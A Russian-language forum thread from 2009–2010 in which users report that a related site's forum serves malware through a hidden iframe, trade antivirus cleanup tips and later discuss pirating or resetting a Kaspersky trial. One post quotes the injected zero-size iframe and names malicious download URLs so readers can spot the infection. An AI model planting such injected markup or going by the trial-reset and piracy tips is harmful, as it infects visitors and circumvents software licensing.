Вирус!

Evgeniy R 27-11-2009 12:53

На сайте Эдган точнее на форуме есть вирусяга!!! Так что у кого нет файрвола можите прилипнуть.

никитос 27-11-2009 13:29

Только что оттуда. Аваст молчит.

Gin.ru 27-11-2009 14:02

Есть такое дело. Висит скрытый фрейм. Браузер ломится на script-meta09.com и качает оттуда пакость. Фу-ууу админам эганского форума...

Gin.ru 27-11-2009 14:04

quote:
Originally posted by никитос:

Аваст молчит.


У меня KIS орёт, что идёт обращение к -http://script-meta09.com/index/aHere.class, который содержит Trojan-Downloader.Java.Agent.ab

Эдуард 27-11-2009 15:38

Все пофиксено еще вчера было.

Gin.ru 27-11-2009 17:59

Значит после этого опять инфицировали форум

Fake 27-11-2009 19:48

Вот, похоже, из-за этого я вчера и занимался форматированием всех своих винтов на компе. Подцепил такую срань, что ни в сказке сказать, ни пером описать. Пля.

mavic 28-11-2009 12:50

Почистили уже? а то у меня лицензия на антивирь кончилась.

Gin.ru 28-11-2009 01:55

quote:
Originally posted by mavic:

Почистили уже?



нет. Легко убедиться Ржу не могу
Откройте исходный текст центральной страницы форума (в IE меню "Вид"-> Просмотр HTML-кода). Если на предпоследней строке увидите что-то типа

quote:
«iframe rsqdf='QmW7cFUR' src='http://mobi-sripts.com/s/in.cgi?6 ' ulmnu='JjfHev5B' width='0' height='0' style='display:none'»«/iframe»

значит пакость там. На момент, когда пишу эти строки - так и есть :<

Эйнштейн 28-11-2009 16:07

Протестил без фаервола, аваст поругался на один троян и один адэвэйр, но пропустил ещё два трояна.. Эти падлы заблокировали инет (через фаервол, кстати) и модифицировали некоторые драйвера от явы и звука. Лечится КьюрИтом из под АВЗгварда нормально, Но потом этим же авз надо проверить все библиотеки и дрова на подозрительные.

Fake 28-11-2009 18:02

Я словил какую-то гадость, которая вывесила поверх всех окон порнуху, которую назвала рекламной заставкой и предложила отправить СМС на номер 3649.
Заблокировала прописанный антивирус (Avira Anrivir), прописанную Оперу (ИЕ работал), квип.
Так же, заблокировала доступ к Диспетчеру файлов (ни три кнопки, ни вызов через коммандную строку не работали). Запущенные с флешки проги для просмотра запущенных процессов отрубались на лету (закрывались после открытия), запущенный с флешки антивирус успел только частично проверить комп, потом перезагрузка. Безопасный режим просто не грузится. Попытался прогрузится с сидюка с ДрВебом под линухом, не получилось. Толи руки кривы, толи еще что. Погоревал, погоревал и форматнул оба харда нахрен.
Раньше подобную хрень видел как надстройку к браузеру, а тут она самостоятельная стала. Работает независимо от всего.
Уррроды...

Эйнштейн 28-11-2009 23:38

Fake, уж не cmedia ли ты поймал? или fieryads.. У меня недавно такое было, обошелся меньшей кровью, в компьютерной ветке писал. Без avz все антивирусы бесполезны..

Fake 29-11-2009 12:00

quote:
Originally posted by Эйнштейн:
Fake, уж не cmedia ли ты поймал? или fieryads.. У меня недавно такое было, обошелся меньшей кровью, в компьютерной ветке писал. Без avz все антивирусы бесполезны..

Вот как раз AVZ оно и отлупляло но половине работы.

Эйнштейн 29-11-2009 12:13

Если включать AVZguard, то ничего вирус возразить уже не сможет

Fake 29-11-2009 12:24

quote:
Originally posted by Эйнштейн:

Если включать AVZguard, то ничего вирус возразить уже не сможет



А как его подключить? У меня эта закладка не активна. Скачал другую версию AVZ, та же история.

PS Вопрос отпал. Под ХР все работает.

Эйнштейн 29-11-2009 12:35

хз, версия 4.32, всё активно. Потом нужно выбрать второй пункт этого меню и оттуда запустить cureit

Fake 29-11-2009 12:41

Я его воткнул на старый ноут с МЕ. Под МЕ эти две закладки не активны.

Эйнштейн 29-11-2009 12:52

ну дык Улыбаюсь хр и милениум слишком разные просто, там другая версия проги требуется

unnamed13 29-11-2009 11:32

А на какие браузеры эта дрянь садиццо? Я вчера заходил с w7 через ff3.5.5 - не заметил ничего необычного. Из плагинов у меня только adblock+. За ie8 + smartscreen не скажу, но вроде чисто.

За линукс с ff/opera/chrome я спокоен, винда на еее живет второй ос. Отпишитесь кто чем поймал.

Fake 29-11-2009 13:41

У меня она сидела не на браузере. Включил комп, кликнул на антивирус и тут тебе окно на 2/3 экрана с порнухой и предлжением отправить СМС.

ЗЫ Винда ХР, Опера 10, Avira Antivir

miksa 29-11-2009 15:30

Вот тады мне объясните юзеру: ХР, Касперский, захожу на форум часто, очень часто. За прошедшие дни Каспер ни разу не руганулся! Окон, со всякой хренью не всплывало, тока комп стал слегка подтормаживать одно время, но в данный момент вроде всё нормально.
Полные проверки через Касперского делал - попросил удалить Куип (асю). Вирусняк, что выборочно приходит или он есть, тока я его не ощущаю? Грущу

unnamed13 29-11-2009 19:52

Видимо эта херь лезет если обновления не ставишь - типа дыры в системе.
У меня всё патченое-перепатченое - форточке лицензионно расово чистые.

Эйнштейн 29-11-2009 23:30

У меня всё рассово русское Ржу не могу, скажите, форум уже переустановили? Ачкую заходить..

unnamed13 30-11-2009 11:24

29 обещались переустановить.

Gin.ru 30-11-2009 13:09

quote:
Originally posted by Эйнштейн:

форум уже переустановили? Ачкую заходить..


не боись. Усё починили уже Улыбаюсь

Neznajka 03-12-2009 18:25

да, у меня тоже оттуда залез этот вирус.
вылезла хня какая то с просьбой прислать смс.
еле вычистил НОД32 с перезагрузкой и установкой даты на год назад.
теперь намано всё, но иногда броузер срубаеться.

в диспетчере висел как винагент вроде.

Эйнштейн 04-12-2009 18:29

Какбэ.. они снова лезут. win32.hllw.shadow.based & trojan.packed.16593

dizel-xp 05-12-2009 12:45

Касперский ничего не выявлял, ни чего не вылазит. Люблю Каспера Улыбаюсь

Drivovich 09-12-2009 15:23

Вообще неплохо иногда проверять свой комп целиком какой ньть прогой типа CureIt! от Dr. Web или Virus removal tool От каспера. Желательно делать это в "SAFE MODE", а ещё лучше грузя систему с диска типа BARTPE или аналогичного LIVE CD. И не забываем обновлять систему - дыр в Винде ещё полным полно, если винда "серая", то качать обвновления можно отсюда - http://forum.oszone.net/thread-145420.html Удачи !

Exp10iT 11-12-2009 09:59

quote:
Originally posted by dizel-xp:
Касперский ничего не выявлял, ни чего не вылазит. Люблю Каспера Улыбаюсь

-Видишь Суслика?
-Нет.
-И я нет, а он есть. Дразнюсь

DiXXX 01-01-2010 02:50

quote:
Originally posted by никитос:
Только что оттуда. Аваст молчит.

У меня стоял аваст. А потом была бессонная ночь... Теперь стоит Кашпирофский ИС 2010, и много чего интересного повылезало Ржу не могу http://guns.allzip.org/topic/169/567474.html Только STALKER стал подтормаживать, если антивирус не отключить.

КЕЙДЖ 01-01-2010 20:52

quote:
Originally posted by DiXXX:

Только STALKER стал подтормаживать, если антивирус не отключить.


если не через инет играешь то можешь антивирус отключить в сталкера рубанутся, потом опять каспера врубил и полез покорять просторы интернета :-) (а так без него в инет ни ни )

DiXXX 01-01-2010 21:11

quote:
Originally posted by КЕЙДЖ:

то можешь антивирус отключить в сталкера рубанутся,



Я так и делаю Улыбаюсь Кашпировский- весчь! 1600 только на год жаба душит, а ключ хрен найдешь... Беда-а. Улыбаюсь

DiXXX 01-01-2010 21:34

Я тут поизучал немного, если правильно понял каспер продается для установки на два компа. Этот гад собирает сведения о системе и передает при установке Кашпировскому лично Ржу не могу. При попытке регистрации третьего компа юзер идет лесом. Это началось в КИС 2010 Грущу

Шмулевич 04-01-2010 19:57

Кажый день тот форум посещаю и ничего описанного не обнаружил.

Olegych33 05-01-2010 18:26

quote:
КЕЙДЖ

quote:
DiXXX

Ребята, на лицензии каспера можно съэкономить, купив ОБНОВЛЕНИЕ КИС2010 за 960 руб. У меня все без проблем работает Улыбаюсь

КЕЙДЖ 05-01-2010 18:45

но уворовать то спортивнее Ржу не могу

DiXXX 05-01-2010 21:45

quote:
Originally posted by КЕЙДЖ:

но уворовать то спортивнее



+1. Но, похоже, придется покупать...
quote:
Originally posted by Olegych33:

Ребята, на лицензии каспера можно съэкономить, купив ОБНОВЛЕНИЕ КИС2010 за 960 руб.



Была такая мысль, но на месте Кашпировского я бы такого постарался не допустить. Может обновлялась не пробная тридцатидневная версия, а предыдущая лицензионная?

КЕЙДЖ 05-01-2010 22:06

а чего пробная версия не обновляется ? если обновляется то можно до бесконечности ставить и удалять, просто постоянно будет напоминать дай деньгу дай Ржу не могу

DiXXX 05-01-2010 23:11

quote:
Originally posted by КЕЙДЖ:

а чего пробная версия не обновляется ?



Она работает только 30 дней, при этом естественно обновляется и т.д.. Второй раз ее на этот комп не поставить. Сейчас душу жену на 1600р. Улыбаюсь

Olegych33 06-01-2010 12:42

quote:
DiXXX

Поставил, и при установке указал, что есть ключ. Вообще про обновление сказано только на коробке, внутри обычный диск с дистрибутивом и серийником. И этот вариант мне подсказал знакомый продавец Касперского, ну а я, соответственно, воспользовался и делюсь с остальными. Так что все будет пучком Улыбаюсь Не трать лишние бабки Улыбаюсь

DiXXX 06-01-2010 01:06

quote:
Originally posted by Olegych33:

Так что все будет пучком Не трать лишние бабки



Спасибо за наводку Улыбаюсь. У меня еще есть 26 дней, буду думать.

КЕЙДЖ 06-01-2010 14:14

quote:
Originally posted by DiXXX:

Второй раз ее на этот комп не поставить



это почему ещё ? просто она создаёт запись в реестре почистить реестр , найти всё что связано с касперским удалить и вуаля Улыбаюсь
примерно так
http://guns.allzip.org/topic/84/409966.html
хотя сейчас проги деинстоляторы далеко продвинулись и удаляют всё вместе с ключами( хотя на 10 не пробовал может и не удалит ) , если надо прогу деинстолятор то давай мыло пришлю , деинстолятором виндусовским не пользуюсь уже давно .
P.s чёто уверености у меня поубавилось через 29 дней посмотрим Ржу не могу , а в прогах которые сбрасывают триал и как бы позволяют ставить его снова и снова сидит троян Грущу

КЕЙДЖ 08-01-2010 15:31

отписал в личку Ржу не могу

Gribnik78 11-01-2010 16:20

quote:
Originally posted by DiXXX:

Я так и делаю Улыбаюсь Кашпировский- весчь! 1600 только на год жаба душит, а ключ хрен найдешь... Беда-а. Улыбаюсь

"Вам презервативы качественные или китайские?...(R) Дразнюсь

Тоже много лет жаба душила, но когда за полгода 3 раза переустанавливал из-за вирусни и потерял очень много нужной по работе и просто полезной информации- пристрелилнах эту самую сволочную жабу и купил лЫцензию "КИСу Кошмаровского 2009"(R) и в настройках сразу поставил на автоматическое обновление при каждом подключении... вот уже почти год- ни каких проблем. Скоро С УДОВОЛЬСТВИЕМ заплачу за продление ключа Дразнюсь Это ж копейки по сравнению с ...(каждый думает о своих проблемах). Я на бензин, на покатушки, шашлыки и прочее развлечение- по 1,5-2 тысячи Русских карбованцев в месяц трачу. а тут купил раз и целый год кайфа Ржу не могу

Кстати, как бывший пользователь пиратского каспера с непойми какими ключами на месяц а потом в чёрный список; и как нынешний пользователь ЛИЦЕНЗИИ- авторитетно заявляю: пиратка них..... нифига не видит и тормозит машинку сильнее раза в 1,5-2, нежели лицензия! Дразнюсь

Зы: сегодня заходил на ЭДганогвский сайт: каспер хрюкнул разок, что, дескать-пресёк попытку прорыва хрен пойми чего на мой комп и больше не квакал Дразнюсь внимания, по привычке не обратил. сейчас по времени посещения и времени фиксации в отчёте каспера сопоставил.

вот чего он там на квакал: Intrusion.Win.MSSQL.worm.Helkern

также этим же вирусом за сегодня зафиксированы ещё 3 попытки проникновения, причём одна с ГАНЗы и два- с левых сайтов к пневме не относящихся. По ходу дела- массовая атака.
далее каспер по умолчанию пресекает.

Так же с ЭДгановского сайта зафиксированы 2 баннера.


КЕЙДЖ 11-01-2010 19:00

ну если само тело программы скачено с сервера касперского ( не выложено на стороннем ресурсе а следовательно не прошло обработку умными дядями ) и ключ подходит то есть не забанен, он ни чем от лицухи не отличается, это та же самая лицензия , тут либо смирится что рано или поздно придётся менять ключ или покупать лицуху но разницы не будет ,при условии ещё раз повторюсь что дистрибутив проги скачен на оф сайте , а базы касперского надо поставить если лицуха на автоматическое обновление то есть раз в 3 часа , так как вирусы пишут быстрей чем успевают писать лекарство с ним . так что раз в день это мало :-)